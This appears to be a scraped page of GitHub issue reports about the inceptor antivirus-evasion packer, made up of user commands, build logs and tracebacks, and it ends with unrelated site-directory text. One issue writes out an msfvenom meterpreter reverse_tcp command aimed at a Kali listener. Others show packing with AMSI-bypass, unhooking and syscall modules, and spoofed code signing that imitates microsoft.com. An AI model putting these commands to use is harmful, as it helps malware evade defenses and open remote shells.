raw -o atlas_packed.exe
←[92m[+]←[37m Native Artifact Generator Started At 2021-11-24 10:17:34.200562←[3
7m
←[94m[]←[37m Phase 0: Loading...←[37m
←[94m[]←[37m Phase 1: Converting binary into shellcode←[37m
←[36m [>]←[37m Transformer: Loader←[37m
←[94m[]←[37m Phase 2: Encoding←[37m
←[94m[]←[37m Phase 3: Generating source files using CLASSIC←[37m
←[36m [>]←[37m Phase 3.1: Writing CPP file in .\temp\tmpwy0x8ibr.cpp←[37m
←[94m[*]←[37m Phase 4: EXE compilation and Signing←[37m
←[36m [>]←[37m Phase 4.1: Compiling EXE...←[37m
Traceback (most recent call last):
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenera
tor.py", line 249, in generate
self.generate_wrapped()
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenera
tor.py", line 292, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenera
tor.py", line 201, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\Administrator\inceptor\inceptor\compilers\Compiler.py", line 66
, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subpr
ocess.py", line 420, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subpr
ocess.py", line 501, in run
with Popen(*popenargs, **kwargs) as process:
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subpr
ocess.py", line 966, in init
self._execute_child(args, executable, preexec_fn, close_fds,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subpr
ocess.py", line 1435, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied
(venv) C:\Users\Administrator\inceptor\inceptor>
I found that the compiler does not use MFC in the static library, which may cause the computer without the library file to not work properly
**Is your feature request related to a problem?
Yes, when obfuscating native binaries, they cannot run on machines that do not have all the dlls in place
Moreover, even when manually copied over the proper vcruntime140.dll, it will not start saying
The application was unable to start correctly (0xxxxxx7b)
Additional context
Ran inceptor over a native binary and executed on a clean windows machine
Thanks again.
Describe the bug
I use the command containing "-m dinvoke" to compile the packaged exe, which will cause injection of Notepad exceptions
To Reproduce
my os is windows10 and VS version is VS2022
I use msfvenom to create the raw payload in kali, command as below
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
the inceptor bypass command is "python inceptor.py donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15"
use command "demo.bat xx.exe" and the inject victim notepad will exit abnormally
But if I remove the options -m dinvoke, then the final compiled exe can reverse connection to kali successfully.
or if I remove the options -P, then the final compiled exe can also reverse connection to kali successfully.
Expected behavior
run "demo.bat xx.exe" and the final compiled payload can reverse connection to kali
Screenshots
If applicable, add screenshots to help explain your problem.
Debug Info:
▒ by d3adc0de (@klezVirus)
--------------------------------------------------------------------------------------
[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
[>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 1228
[>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
[>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
[>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe" /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe" "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
-----------------------------------------------
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447
[+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
[+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
[+] Signed with: CarbonCopy
[*] Phase 7: Finalising
[+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994
Additional context
Add any other context about the problem here.
Hi, I tried your tool using a .def file created with
dumpbin /exports file.dll /out:file.def
I provided the file.def as --exports parameter but I get the following error when executed:
Traceback (most recent call last):
File "inceptor.py", line 268, in <module>
generator = NativeArtifactGenerator(binary_abs_path,
File "C:\Users\Username\Documents\Tools\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 147, in __init__
self.dll_compiler_args["/DEF"] = f'"{os.path.abspath(self.exports)}"'
TypeError: 'NoneType' object does not support item assignment
How can I set custom exports?
Originally posted by @CT-H00K in #22 (comment)
Hey @klezVirus ,
apologies firstly. I bring another issue. I tried multiple times, but the new version install fails for me :(
virtualenv --python=python3 venv-python3
venv-python3\Scripts\activate.bat
cd inceptor
pip3 install -r ..\requirements.txt
[...]
ERROR: Could not find a version that satisfies the requirement win32-sectime (from versions: none)
ERROR: No matching distribution found for win32-sectime
Did I do something wrong?
thanks in advance!
I am countering issue when try to encode existing msfvenom exe
msvcp140.dll missing
Terminal output:
(venv) C:\Users\Administrator\inceptor\inceptor>cd ..
(venv) C:\Users\Administrator\inceptor>pip install -r requirements.txt
Requirement already satisfied: frida in c:\users\administrator\inceptor\venv\lib
\site-packages (from -r requirements.txt (line 1)) (15.1.12)
Requirement already satisfied: frida-tools in c:\users\administrator\inceptor\ve
nv\lib\site-packages (from -r requirements.txt (line 2)) (10.4.1)
Requirement already satisfied: jmespath in c:\users\administrator\inceptor\venv
lib\site-packages (from -r requirements.txt (line 3)) (0.10.0)
Requirement already satisfied: colorama in c:\users\administrator\inceptor\venv
lib\site-packages (from -r requirements.txt (line 4)) (0.4.4)
Requirement already satisfied: pandas in c:\users\administrator\inceptor\venv\li
b\site-packages (from -r requirements.txt (line 5)) (1.3.4)
Requirement already satisfied: numpy in c:\users\administrator\inceptor\venv\lib
\site-packages (from -r requirements.txt (line 6)) (1.21.4)
Requirement already satisfied: pefile in c:\users\administrator\inceptor\venv\li
b\site-packages (from -r requirements.txt (line 7)) (2021.9.3)
Requirement already satisfied: pycryptodome in c:\users\administrator\inceptor\v
env\lib\site-packages (from -r requirements.txt (line 8)) (3.11.0)
Requirement already satisfied: pyOpenSSL in c:\users\administrator\inceptor\venv
\lib\site-packages (from -r requirements.txt (line 9)) (21.0.0)
Requirement already satisfied: py7zr in c:\users\administrator\inceptor\venv\lib
\site-packages (from -r requirements.txt (line 10)) (0.16.3)
Requirement already satisfied: win32-setctime in c:\users\administrator\inceptor
\venv\lib\site-packages (from -r requirements.txt (line 11)) (1.0.3)
Requirement already satisfied: setuptools in c:\users\administrator\inceptor\ven
v\lib\site-packages (from frida->-r requirements.txt (line 1)) (58.3.0)
Requirement already satisfied: pygments<3.0.0,>=2.0.2 in c:\users\administrator
inceptor\venv\lib\site-packages (from frida-tools->-r requirements.txt (line 2))
(2.10.0)
Requirement already satisfied: prompt-toolkit<4.0.0,>=2.0.0 in c:\users\administ
rator\inceptor\venv\lib\site-packages (from frida-tools->-r requirements.txt (li
ne 2)) (3.0.22)
Requirement already satisfied: pytz>=2017.3 in c:\users\administrator\inceptor\v
env\lib\site-packages (from pandas->-r requirements.txt (line 5)) (2021.3)
Requirement already satisfied: python-dateutil>=2.7.3 in c:\users\administrator
inceptor\venv\lib\site-packages (from pandas->-r requirements.txt (line 5)) (2.8
.2)
Requirement already satisfied: future in c:\users\administrator\inceptor\venv\li
b\site-packages (from pefile->-r requirements.txt (line 7)) (0.18.2)
Requirement already satisfied: six>=1.5.2 in c:\users\administrator\inceptor\ven
v\lib\site-packages (from pyOpenSSL->-r requirements.txt (line 9)) (1.16.0)
Requirement already satisfied: cryptography>=3.3 in c:\users\administrator\incep
tor\venv\lib\site-packages (from pyOpenSSL->-r requirements.txt (line 9)) (36.0.
0)
Requirement already satisfied: brotli>=1.0.9 in c:\users\administrator\inceptor
venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (1.0.9)
Requirement already satisfied: pycryptodomex>=3.6.6 in c:\users\administrator\in
ceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (3.11.
0)
Requirement already satisfied: pyzstd>=0.14.4 in c:\users\administrator\inceptor
\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.15.0)
Requirement already satisfied: pybcj>=0.5.0 in c:\users\administrator\inceptor\v
env\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.5.0)
Requirement already satisfied: multivolumefile>=0.2.3 in c:\users\administrator
inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.2
.3)
Requirement already satisfied: pyppmd>=0.17.0 in c:\users\administrator\inceptor
\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.17.3)
Requirement already satisfied: texttable in c:\users\administrator\inceptor\venv
\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (1.6.4)
Requirement already satisfied: cffi>=1.12 in c:\users\administrator\inceptor\ven
v\lib\site-packages (from cryptography>=3.3->pyOpenSSL->-r requirements.txt (lin
e 9)) (1.15.0)
Requirement already satisfied: wcwidth in c:\users\administrator\inceptor\venv\l
ib\site-packages (from prompt-toolkit<4.0.0,>=2.0.0->frida-tools->-r requirement
s.txt (line 2)) (0.2.5)
Requirement already satisfied: pycparser in c:\users\administrator\inceptor\venv
\lib\site-packages (from cffi>=1.12->cryptography>=3.3->pyOpenSSL->-r requiremen
ts.txt (line 9)) (2.21)
(venv) C:\Users\Administrator\inceptor>cd inceptor
(venv) C:\Users\Administrator\inceptor\inceptor>python inceptor.py dotnet C:\Use
rs\Administrator\inceptor\inceptor\venom.exe -o Desktop\dropnpack.exe -e xor -e
aes -e hex
←[92m[+]←[37m .Net Artifact Generator Started At 2021-11-23 14:29:02.312008←[37m
←[94m[]←[37m Phase 0: Loading...←[37m
←[94m[]←[37m Phase 1: Converting binary into shellcode←[37m
←[36m [>]←[37m Transformer: Pe2sh←[37m
[!] Virtual section size is out ouf bounds: 400
[!] Truncated to maximal size: 360, buffer size:4360
[!] Virtual section size is out
ouf bounds: 400
[!] Truncated to maximal size: 360, buffer size:4360
Traceback (most recent call last):
File "C:\Users\Administrator\inceptor\inceptor\generators\DotNetArtifactGenera
tor.py", line 254, in generate
self.generate_wrapped()
File "C:\Users\Administrator\inceptor\inceptor\generators\DotNetArtifactGenera
tor.py", line 276, in generate_wrapped
shellcode_bytes = self.transformer.transform(target=self.file)
File "C:\Users\Administrator\inceptor\inceptor\converters\Pe2Shellcode.py", li
ne 46, in transform
return bin2hex4pe2sh(outfile)
File "C:\Users\Administrator\inceptor\inceptor\utils\utils.py", line 63, in bi
n2hex4pe2sh
return unhexlify(subprocess.check_output(f"{utility} "{filename}"").decode
().strip())
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subpr
ocess.py", line 420, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subpr
ocess.py", line 524, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command 'C:\Users\Administrator\inceptor\inceptor
\libs\public\chunlie.exe "C:\Users\Administrator\inceptor\inceptor\temp\venom.sh
c.exe"' returned non-zero exit status 3221225781.
(venv) C:\Users\Administrator\inceptor\inceptor>
It seems to be a coding problem
To Reproduce
python3 inceptor.py native 1.raw -o packed.exe -m syscalls -m dinvoke -P
Complete! Files written to:
E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.h
E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.c
E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.asm
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\ml64.exe" /c /nologo /Zi /Fo"E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.0.obj" /W3 /errorReport:prompt "E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.asm"
Assembling: E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.asm
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "BUILD_DLL" /D "NDEBUG" /D "SAGAT_EXPORTS" /D "_WINDOWS" /D "_WINDLL" /D "_USRDLL" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column /LD /Fo:"E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.1.obj" /I "E:\bypassAV\inceptor\inceptor\temp" "E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.c"
Traceback (most recent call last):
File "E:\bypassAV\inceptor\inceptor\engine\modules\TemplateModule.py", line 84, in from_name
_instance = _class(kwargs=kwargs['kwargs'])
File "E:\bypassAV\inceptor\inceptor\engine\modules\SyscallsModule.py", line 46, in init
self.build(kwargs=kwargs)
File "E:\bypassAV\inceptor\inceptor\engine\modules\SyscallsModule.py", line 95, in build
cl.compile([f"{syscalls_basepath}.c"])
File "E:\bypassAV\inceptor\inceptor\compilers\Compiler.py", line 68, in compile
print(output.decode())
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd5 in position 314: invalid continuation byte
[DEBUG] Loading module Dinvoke
[+] Native Artifact Generator Started At 2022-08-01 14:38:50.065093
[] Phase 0: Loading...
[] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[] Phase 2: Encoding
[] Phase 3: Generating source files using CLASSIC-DINVOKE_SYSCALLS
[>] Phase 3.1: Writing CPP file in .\temp\tmpe259n97n.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\cl.exe" /permissive- /Bt+ /GS /W3 /Gy /Zi /Gm- /O2i /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /MD /FC /EHsc /nologo /diagnostics:column /Fe:"E:\bypassAV\inceptor\inceptor\temp\packed-temp.exe" "E:\bypassAV\inceptor\inceptor\temp\tmpe259n97n.cpp" /link
Traceback (most recent call last):
File "E:\bypassAV\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 248, in generate
self.generate_wrapped()
File "E:\bypassAV\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 291, in generate_wrapped
self.compile_exe(shellcode)
File "E:\bypassAV\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 200, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "E:\bypassAV\inceptor\inceptor\compilers\Compiler.py", line 68, in compile
print(output.decode())
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xa1 in position 389: invalid start byte
git clone --recurse https://github.com/klezVirus/inceptor.git
Produces the following errors
Cloning into 'inceptor'...
remote: Enumerating objects: 272, done.
remote: Counting objects: 100% (272/272), done.
remote: Compressing objects: 100% (203/203), done.
remote: Total 272 (delta 56), reused 272 (delta 56), pack-reused 0
Receiving objects: 100% (272/272), 15.58 MiB | 1.19 MiB/s, done.
Resolving deltas: 100% (56/56), done.
Submodule 'inceptor/obfuscators/powershell/chameleon' ([email protected]:klezVirus/chameleon.git) registered for path 'inceptor/obfuscators/powershell/chameleon'
Cloning into 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon'. Retry scheduled
Cloning into 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon' a second time, aborting
python update-config.py
Produces the following errors
Traceback (most recent call last):
File "C:\Users\user\Desktop\inceptor\inceptor\update-config.py", line 325, in <module>
update_config()
File "C:\Users\user\Desktop\inceptor\inceptor\update-config.py", line 55, in update_config
c = Config()
File "C:\Users\user\Desktop\inceptor\inceptor\config\Config.py", line 16, in __init__
self.rebase()
File "C:\Users\user\Desktop\inceptor\inceptor\config\Config.py", line 38, in rebase
for key, directory in self.config["DIRECTORIES"].items():
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\configparser.py", line 963, in __getitem__
raise KeyError(key)
KeyError: 'DIRECTORIES'
I get this error when i try to run inceptor on a 32bit dotnet payload. Is there anyway to solve this issue?
Describe the bug
Permission denied error when run
To Reproduce
Steps to reproduce the behavior:
inceptor.py native HookDetector45.exe -o interceptor_test01.exe
[+] Native Artifact Generator Started At 2022-01-11 21:23:59.140182
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Donut
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmpjm9e2zib.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
Traceback (most recent call last):
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
self.generate_wrapped()
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 292, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 201, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 420, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 501, in run
with Popen(*popenargs, **kwargs) as process:
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 966, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 1435, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is deniedDebug Info:
as mentioned in issue#29 i already tried this
.\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe
clang-cl: error: no input filesrunning with DEBUG=1
inceptor.py native messagebox_shellcode.raw -o int_msg.exe
[+] Native Artifact Generator Started At 2022-01-11 21:41:27.491180
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmptayar5px.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
"C:\Users\test\Downloads\interceptor\inceptor\inceptor" x64 & "" /permissive- /Bt+ /GS /W3 /Gy /Zi /Gm- /O2i /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /MD /FC /EHsc /nologo /diagnostics:column /Fe:"C:\Users\test\Downloads\interceptor\inceptor\inceptor\temp\int_msg-temp.exe" "C:\Users\test\Downloads\interceptor\inceptor\inceptor\temp\tmptayar5px.cpp" /link
Traceback (most recent call last):
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
self.generate_wrapped()
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 292, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 201, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 420, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 501, in run
with Popen(*popenargs, **kwargs) as process:
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 966, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 1435, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is deniedThanks a lot!
Hey @klezVirus ,
when you have a moment, could you have a look at below.
I tried to use your tool to generate some DLL and sign them. Here are my results:
python inceptor.py native c:\repos\msgbox32.raw --arch x86 -o cldapi.dll
Does not work. The exported function is called _PsychoBlastEP@16 and it cannot be called successfully.
python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll
Works perfectly.
python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll -e XOR
Does not work.
python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll -s -sd microsoft.com -so
Works but it is not signed.
python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll -s -sd www.microsoft.com
Works and it is signed.
python inceptor.py native c:\repos\msgbox64.raw --arch x64 -o cldapi.dll --clone C:\Windows\system32\ntdll.dll
Does not work. Breaks the DLL. The output DLL has all exported functions from ntdll.dll.
Any chance for fixing them, please? :)
thanks
Rafal
Thanks for share your tools. I have a problem testing the tool.
(venv) C:\Users\trinhbang\Desktop\No1\inceptor\inceptor>python inceptor.py native mihawk.exe -t donut -e xor -C llvm -O --delay 60 --arch x64 --sgn --sign -m amsi,delay,syscalls,unhook,amsi -o mihawk2.exe
[+] Native Artifact Generator Started At 2021-08-08 14:30:53.471625
[] Phase 0: Loading...
[] Phase 1: Converting binary into shellcode
[>] Transformer: Donut
[] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[] Encoded filename: C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\temp\tmpkq4dnf73.raw.sgn
[>] Phase 2.2: Using Inceptor chained-encoder to encode the shellcode
[>] Encoder Chain: XorEncoder
[] Phase 3: Generating source files using CLASSIC
[>] Phase 3.2: Writing CPP file in .\temp\tmp3f5mr8k8.cpp
[] Phase 4: EXE compilation and Signing
[>] Phase 4.2: Compiling EXE...
Traceback (most recent call last):
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 202, in generate
self.generate_wrapped()
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 241, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 156, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\trinhbang\Desktop\No1\inceptor\inceptor\compilers\Compiler.py", line 63, in compile
output = subprocess.check_output(cmd)
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 424, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 505, in run
with Popen(*popenargs, **kwargs) as process:
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 951, in init
self._execute_child(args, executable, preexec_fn, close_fds,
File "c:\users\trinhbang\appdata\local\programs\python\python39\lib\subprocess.py", line 1420, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied
I try run cmd with Administrator, but cant fixed problem.
Thanks for read.
When I try to run the packed exe I get this error: The specified executable is not a valid application for this OS platform.
This is the used command:
python .\inceptor.py dotnet e_inj.exe -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"
This is the output:
[+] .Net Artifact Generator Started At 2021-10-31 16:29:16.934982
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Pe2sh
[WARNING] This is a console application! The recommended subsystem is GUI.
[WARNING] e_inj.exe may not work in .NET
[*] Phase 2: Encoding
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 58060
[>] Shellcode Signature: 6d567a0c9b79df74844d9d33cad96814185a4416
[*] Phase 3: Generating source files using PE_LOAD
[>] Phase 3.1: Writing CS file in .\temp\tmpm0gi_vr3.cs
[*] Phase 4: Compiling
[*] Phase 5: Sign dotnet binary
[+] Signed with: SigThief
[*] Phase 6: Finalising
[+] Success: file stored at packed.exe
[*] Phase 7: Cleaning up
[+] .Net Artifact Generator Finished At 2021-10-31 16:29:17.700150
And this is the error when i try to run the packed exe:
.\packed.exe
Program 'packed.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ .\packed.exe
+ ~~~~~~~~~~~~.
At line:1 char:1
The e_inj.exe executable is written in C with visual studio and compiled in x64.
I get the same error for"
python .\inceptor.py native e_inj.exe -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"
python .\inceptor.py native e_inj.exe -o packed.exe -t pe2sh -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"
Is your feature request related to a problem? Please describe.
The main strength of this packer is it's ability to use templates, but the way to use them is not documented and a bit hard to understand.
Describe the solution you'd like
I would like some documentation on how to use templates and how the template engine works.
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.